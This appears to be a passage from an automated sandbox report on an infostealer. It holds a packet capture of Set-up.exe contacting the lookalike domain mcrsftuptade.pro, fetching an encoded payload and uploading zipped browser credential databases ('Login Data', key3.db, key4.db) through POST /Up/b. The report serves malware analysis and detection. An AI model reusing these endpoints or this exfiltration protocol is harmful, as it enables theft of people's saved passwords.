                                                    May 10, 2025 08:05:50.290477037 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290497065 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290532112 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290570021 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290590048 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290608883 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290628910 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290663958 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290699005 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290733099 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290752888 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290787935 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290807009 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.290827036 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.430722952 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.430743933 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.430772066 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.430855989 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.430883884 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.430905104 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.430952072 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431025028 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431045055 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431133032 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431723118 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431742907 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431763887 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431782961 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431801081 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431821108 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431839943 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431859016 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431878090 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431904078 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431922913 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431941986 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431960106 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.431978941 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432003975 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432023048 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432049990 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432069063 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432087898 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432106018 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432126045 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432145119 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432164907 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432183981 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432202101 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.432220936 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.852917910 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.853853941 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:50.853914976 CEST4973180192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:50.872780085 CEST4973180192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:51.013632059 CEST8049731188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.382227898 CEST4973280192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:51.523806095 CEST8049732188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.523911953 CEST4973280192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:51.524108887 CEST4973280192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:51.665191889 CEST8049732188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.665287018 CEST8049732188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.665335894 CEST8049732188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.665380955 CEST8049732188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.665410995 CEST4973280192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:51.806473017 CEST8049732188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.971762896 CEST8049732188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.971975088 CEST8049732188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:51.972069979 CEST4973280192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:51.989694118 CEST4973280192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:52.130812883 CEST8049732188.114.96.3192.168.2.4
                                                    • mcrsftuptade.pro
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449721188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:35.466841936 CEST101OUTGET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    May 10, 2025 08:05:35.760193110 CEST1358INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:35 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGUm6Rde7pX%2FV2Zq6yzRWIK%2BL2%2FgdWzOgHE3sznBljNAYRNw6Yr3zUgJxXscaET75R5%2F%2BFQryI7KnDQ4S%2FSdolsmLfzwR%2B5ywdHRlLDVs%2B3dBZ77tPDvv%2FaXij8X3x3M%2BaKY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    speculation-rules: "/cdn-cgi/speculation"
                                                    Server: cloudflare
                                                    CF-RAY: 93d73ee929fd7867-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141991&min_rtt=141991&rtt_var=70995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=101&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 33 37 64 36 0d 0a 51 78 64 51 45 77 35 69 54 42 42 64 49 67 49 58 55 47 31 6f 57 67 38 51 48 79 4a 49 46 77 67 54 61 47 56 37 58 56 42 68 56 47 6c 75 64 6c 74 57 55 46 35 57 58 47 52 32 57 6b 4e 62 56 46 4a 75 62 31 56 4c 55 45 41 52 63 46 68 44 55 78 45 73 47 6b 45 51 43 77 55 56 46 55 4a 64 49 67 49 58 55 56 6c 47 56 6c 70 58 48 57 56 41 55 42 42 4d 47 45 49 56 58 42 45 36 47 6c 64 75 62 56 63 42 46 52 34 52 63 42 6f 50 45 47 31 6f 64 56 68 52 55 6d 78 6b 61 58 56 65 57 31 35 62 56 32 39 63 65 31 31 41 58 6c 6c 63 46 32 46 4c 55 32 52 70 5a 30 4a 52 53 78 64 32 55 6e 52 5a 46 78 34 54 51 42 73 4e 41 78 38 69 53 46 73 51 43 78 5a 61 58 30 42 63 62 56 30 62 56 30 6c 52 47 30 6f 65 53 43 4a 57 46 77 67 54 56 6d 56 72 55 51 73 69 46 42 64 43 45 77 34 62 61 32 35 2f 62 31 74 55 58 6d 31 6f 66 6c 68 64 56 47 78 64 61 57 35 79 58 45 74 59 58 31 59 67 65 6c 42 47 55 47 68 6c 59 6b 46 57 63 68 68 78 55 30 56 56 47 78 73 51 52 79 49 43 42 42 34 54 52 46 63 56 43 42 46 6a 55 45 64 64 58 46 45 58 55 6b 70 57 [TRUNCATED]
                                                    Data Ascii: 37d6QxdQEw5iTBBdIgIXUG1oWg8QHyJIFwgTaGV7XVBhVGludltWUF5WXGR2WkNbVFJub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXUVlGVlpXHWVAUBBMGEIVXBE6GldubVcBFR4RcBoPEG1odVhRUmxkaXVeW15bV29ce11AXllcF2FLU2RpZ0JRSxd2UnRZFx4TQBsNAx8iSFsQCxZaX0BcbV0bV0lRG0oeSCJWFwgTVmVrUQsiFBdCEw4ba25/b1tUXm1oflhdVGxdaW5yXEtYX1YgelBGUGhlYkFWchhxU0VVGxsQRyICBB4TRFcVCBFjUEddXFEXUkpWIkUZSRNaGw0QUVxkVgoTGBtHEAkiZGl+XldYW25vR1daVV1RZWtxW3JXWFcRcFxBbm9VS1BAEXBYQ1MRLBpBEAsFFRVCXSICF1FZRlZaVx1lQFAQTBhCFVwROhpXbm1XARUeEXAaDxBtaHVYUVJsZGl1XlteW1dvXHtdQF5ZXBdnXXNMVFBdUWVrZ0BlShV2UEBYFR4RdBoPAx0WSVkQ
                                                    May 10, 2025 08:05:35.760236025 CEST1358INData Raw: 43 53 4a 62 58 55 42 65 57 56 77 5a 56 30 74 6c 47 6b 67 65 53 68 5a 58 46 51 67 52 59 6d 52 70 55 51 6b 57 46 52 56 43 45 54 6f 61 61 57 35 39 57 31 70 57 58 6d 39 63 66 31 70 64 56 6c 68 63 61 32 35 77 61 45 70 61 58 31 51 55 65 6c 5a 63 55 6e
                                                    Data Ascii: CSJbXUBeWVwZV0tlGkgeShZXFQgRYmRpUQkWFRVCEToaaW59W1pWXm9cf1pdVlhca25waEpaX1QUelZcUnJBaW5kR1xFEndhTFQQHRZNFQgCLBpFXBMOG1RaQW9VUBxUTFwVTx97GlsQCxZba25QMggXHhNEGw0Qb1x0WlFQWGVrd0NpWxViQ11PVlFKIHpHXUZHXEVub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXV0FdWhlXS2U
                                                    May 10, 2025 08:05:35.760301113 CEST1358INData Raw: 6b 51 43 53 4a 61 61 57 35 53 42 77 34 56 48 68 46 77 47 67 38 51 62 57 68 31 57 46 46 53 62 47 52 70 58 6c 68 52 57 31 5a 64 62 31 78 74 52 6c 64 44 46 48 31 57 52 6c 49 69 46 42 64 47 45 77 34 49 47 78 42 44 62 68 6f 50 45 46 31 64 58 46 56 54
                                                    Data Ascii: kQCSJaaW5SBw4VHhFwGg8QbWh1WFFSbGRpXlhRW1Zdb1xtRldDFH1WRlIiFBdGEw4IGxBDbhoPEF1dXFVTXC5dTVcTSRVMEF0iAhdQbWhaBAoRLBpFEAsWZWt+XGNZWW5tZXBnEmB1SlNubWFKUkATRFlBUxMYG0MQCTEUF0JfFgMVQ1pwFlBKVBZEG0kRbhoPEFNoZVQBCiIUF0ITDhtrbn9vW1RebWh3XlFbcldYV21obERXQ
                                                    May 10, 2025 08:05:35.760338068 CEST1358INData Raw: 57 42 55 65 45 58 51 61 44 77 4d 64 46 6b 6c 5a 45 41 6b 69 56 55 5a 58 56 56 4e 63 47 56 64 4c 5a 52 70 49 48 6b 6f 57 56 78 55 49 45 57 4a 6b 61 56 45 41 42 78 73 62 45 45 4d 69 41 68 64 75 62 57 5a 57 56 6c 39 61 62 6c 39 70 62 6e 35 45 58 45
                                                    Data Ascii: WBUeEXQaDwMdFklZEAkiVUZXVVNcGVdLZRpIHkoWVxUIEWJkaVEABxsbEEMiAhdubWZWVl9abl9pbn5EXEVTE1NXU0ZGVUtSbm9PSFBAUBRqQ1NRbF0XHhNAGw0DHyJIWxALFlZHV0FhFlBKVBZEG0kRbhoPEFNoZVQDACIUF0ITDhtrbmFvWVhbX1Nla31DZUpUEmJbX0NFUnJdaW5+RFxFUxNHYBVhRVVbW1cRLBpBEAsFFRV
                                                    May 10, 2025 08:05:35.760371923 CEST1358INData Raw: 68 66 58 56 52 64 56 47 39 65 52 56 70 59 57 56 64 63 58 46 77 69 46 42 64 63 45 77 34 62 51 41 4d 52 66 52 52 4f 45 46 68 51 47 77 30 51 57 48 42 65 57 6b 4a 61 55 56 56 61 55 30 4e 6a 56 31 78 43 56 46 6c 66 55 6c 78 58 62 56 78 57 56 56 6c 61
                                                    Data Ascii: hfXVRdVG9eRVpYWVdcXFwiFBdcEw4bQAMRfRROEFhQGw0QWHBeWkJaUVVaU0NjV1xCVFlfUlxXbVxWVVlaXFBbXm4aGRBfFgMVRQEiRRlJE11dFQgRZlBXXVldVFZXX2JXXUJbVltbVlBuX1ZcUERXU11XakgXHhNaGw0QRDMaSB5KFlBTEAkiW1tfUFlYVlFbcEhbWVtTV15eV3BcWFlQVVJSWF1oWVAQHRZXFQgRdwAXTx1PG
                                                    May 10, 2025 08:05:35.760406017 CEST1358INData Raw: 56 6c 78 66 57 46 70 52 57 47 35 58 55 6c 6c 57 56 31 31 52 57 6c 74 69 58 46 46 52 56 6c 78 59 56 46 70 59 5a 56 4a 51 55 30 45 57 46 52 56 63 45 54 6f 61 51 67 41 4a 46 6b 51 62 53 52 46 70 58 42 63 49 45 31 35 58 57 6c 42 63 59 6c 4a 59 57 6c
                                                    Data Ascii: VlxfWFpRWG5XUllWV11RWltiXFFRVlxYVFpYZVJQU0EWFRVcEToaQgAJFkQbSRFpXBcIE15XWlBcYlJYWl1aXlhXVWFRWlhXWFNUWVpsUF1eWVdTFR4RbhoPEEYGABVPH3saXFYTDhtcXl1hXV9YVlZQVV9bbF1FWl9cSVpTXGZXXVVaRF5cVhEsGlsQCxZOBQIRfRROEFhQGw0QWmJWUFhVUlNaX1hwW1teQVFbXF5eblNaV15
                                                    May 10, 2025 08:05:35.760438919 CEST1358INData Raw: 78 61 45 42 30 57 56 78 55 49 45 58 63 4d 41 42 42 4d 47 45 49 56 57 31 63 69 41 68 64 61 58 31 46 66 55 46 70 65 61 6c 39 58 58 30 46 66 55 31 31 55 57 32 56 65 57 31 64 66 55 6c 64 53 57 46 64 71 56 6c 42 64 56 68 59 56 46 56 77 52 4f 68 70 43
                                                    Data Ascii: xaEB0WVxUIEXcMABBMGEIVW1ciAhdaX1FfUFpeal9XX0FfU11UW2VeW1dfUldSWFdqVlBdVhYVFVwROhpCBgcWRBtJEWlcFwgTUklUU15pXV9VV1lUX1xbYltUVFxaXFFQWmpaWVtfUl8VHhFuGg8QRgAOFU8fexpcVhMOG1JVV2RcX1BbWFpdUVhpXV9QU1VXUl1Ra0hSXFxEUllCESwaWxALFk4DChF9FE4QWFAbDRBdaVBZV
                                                    May 10, 2025 08:05:35.760473013 CEST1358INData Raw: 5a 6c 64 58 57 56 78 66 55 31 68 59 51 32 4e 51 52 56 52 57 56 31 52 66 56 46 6c 75 56 56 74 55 51 56 30 62 47 78 42 64 49 67 49 58 52 51 41 45 43 68 56 50 48 33 73 61 58 46 59 54 44 68 74 63 57 55 4e 73 56 46 35 64 56 56 35 63 57 31 31 61 5a 46
                                                    Data Ascii: ZldXWVxfU1hYQ2NQRVRWV1RfVFluVVtUQV0bGxBdIgIXRQAEChVPH3saXFYTDhtcWUNsVF5dVV5cW11aZFFQV1VbU1hVUmNeXUJQXVFYWhEsGlsQCxZOBgIHIkUZSRNdXRUIEW5ZW1hcUFJZWlhpVlxUX19eU1FUZ1tTXFlQWFZfXm1SFx4TWhsNEEQxCAAQTBhCFVtXIgIXXFpQXVBcUGRSUlhXV11TU15mX1ZfV1pVX1FQblF
                                                    May 10, 2025 08:05:35.760509014 CEST1358INData Raw: 42 61 61 31 74 52 56 56 6c 64 58 56 68 54 56 32 51 61 47 52 42 66 46 67 4d 56 52 51 49 79 43 68 64 50 48 55 38 62 58 6c 59 52 4f 68 70 63 58 46 64 52 57 31 68 54 57 57 64 65 58 56 56 54 58 6b 6c 64 55 46 5a 77 53 46 64 5a 56 6c 70 59 56 56 52 58
                                                    Data Ascii: Baa1tRVVldXVhTV2QaGRBfFgMVRQIyChdPHU8bXlYROhpcXFdRW1hTWWdeXVVTXkldUFZwSFdZVlpYVVRXa1xUVBMYG1kQCSJPBAACFkQbSRFpXBcIE0RJVVtRZVRFUVtZUVVWWmhZXlRdX11UXVBjWlJQWkRWFR4RbhoPEEYFCwMQTixDF1tVFgMVWV9nUF1cWlFcVl5Qb1BfWFBaU11WUmVdUlVcUlRbQl8iFBdcEw4bQAMBN
                                                    May 10, 2025 08:05:35.760549068 CEST1358INData Raw: 55 78 41 66 49 6c 59 58 43 42 4e 44 43 41 4d 44 45 58 30 55 54 68 42 59 55 42 73 4e 45 46 4a 6d 56 46 35 66 56 31 78 63 56 56 64 58 59 6c 4a 63 58 56 68 45 58 6c 74 56 55 47 4a 62 57 46 78 54 52 46 35 62 57 31 78 6d 47 68 6b 51 58 78 59 44 46 55
                                                    Data Ascii: UxAfIlYXCBNDCAMDEX0UThBYUBsNEFJmVF5fV1xcVVdXYlJcXVhEXltVUGJbWFxTRF5bW1xmGhkQXxYDFUUCNAoXTx1PG15WEToaUV9bWVVbUF9wW1dfX11WXFFQZFdUW1BcWlNTWWRSWlQTGBtZEAkiTwQGAhZEG0kRaVwXCBNYV1lcXmZbRVBaVV9UQlRkUVlRWlxUX1BYa1pFWVxdXRUeEW4aDxBGBQ0DEE4sQxdbVRYDFV1
                                                    May 10, 2025 08:05:35.760586977 CEST1358INData Raw: 51 62 53 68 35 49 49 6c 46 52 45 41 73 57 57 6c 42 58 56 6d 39 63 52 56 52 51 55 31 4e 55 56 31 5a 6d 55 56 42 55 58 56 6c 64 55 55 4a 62 63 46 52 65 56 31 39 59 58 31 77 51 48 79 4a 57 46 77 67 54 51 77 67 42 41 78 46 39 46 45 34 51 57 46 41 62
                                                    Data Ascii: QbSh5IIlFREAsWWlBXVm9cRVRQU1NUV1ZmUVBUXVldUUJbcFReV19YX1wQHyJWFwgTQwgBAxF9FE4QWFAbDRBDZFlRWFpSUlBRUmZfV1FUXVRUQlFrWVlcV1pcR1BdaxoZEF8WAxVFAjYKF08dTxteVhE6GlpWU1JJUldaaFxeUFhcVFhCWGJSWF1eWl9WXF9iXlZeExgbWRAJIk8EBAIWRBtJEWlcFwgTUlFeXlJoXVxfVlhQU


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449722188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:36.043103933 CEST414OUTPOST /Up HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 289
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 4e 27 f4 29 6f 00 00 00 6f 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 47 41 53 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 4e 27 f4 29 6f 00 00 00 6f 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b5 00 00 00 00 00
                                                    Data Ascii: PK\d!RN')oo(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857132929e146be9-c76a-4720-bcdb-53011b87bd06","bt":"GAS","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!RN')oo(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
                                                    May 10, 2025 08:05:36.343833923 CEST705INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:36 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yAzCy2OrhufV1P%2FFqc6d%2Bh7FmKo3Hzfx0RYcmFH8mOnDw684ng%2FOV4qXaTiEkOt3Qs0UxmTp9qHOiy%2Bl78vN7k8bCkS6lQ7M%2BXh6lwinohHpvYjYsx182F1HQLXlEni4kLn7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73eecbfeab829-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=140960&min_rtt=140960&rtt_var=70480&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449725188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:38.882163048 CEST13580OUTPOST /Up/b HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 41649
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 c3 94 76 3c 00 a0 00 00 00 a0 00 00 11 00 00 00 62 2f 63 38 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 7a 70 05 00 00 00 01 07 fb 00 00 00 00 0d 07 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: PK\d!Rv<b/c8/0/Login DataSQLite format 3@ .zp [TRUNCATED]
                                                    May 10, 2025 08:05:39.023633957 CEST13580OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.023741961 CEST8148OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.023787022 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.023813009 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.165534019 CEST1038OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.499228001 CEST709INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:39 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGji7rqV78MEhY87HjNt6s2gE%2FQ0cWYTbnXfH3xhN99ySaW8RWH0vuaHGAa6DcouU%2BLE6yt%2FXlnAzvTlBljRWvFD%2FNlHRfIyGji2ODm2ruFBF5eExvlzXezDhOq6H%2FM2EYqL"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73efe79c1f00f-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141374&min_rtt=141374&rtt_var=70687&sent=25&recv=33&lost=0&retrans=0&sent_bytes=0&recv_bytes=41778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449726188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:39.740187883 CEST13580OUTPOST /Up/b HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 524940
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: PK\d!Rb/g1/0/key3.dbPK\d!Rb/g1/0/key4.dbSQLite format 3@ .jz<{{{a{zz<z [TRUNCATED]
                                                    May 10, 2025 08:05:39.881551981 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
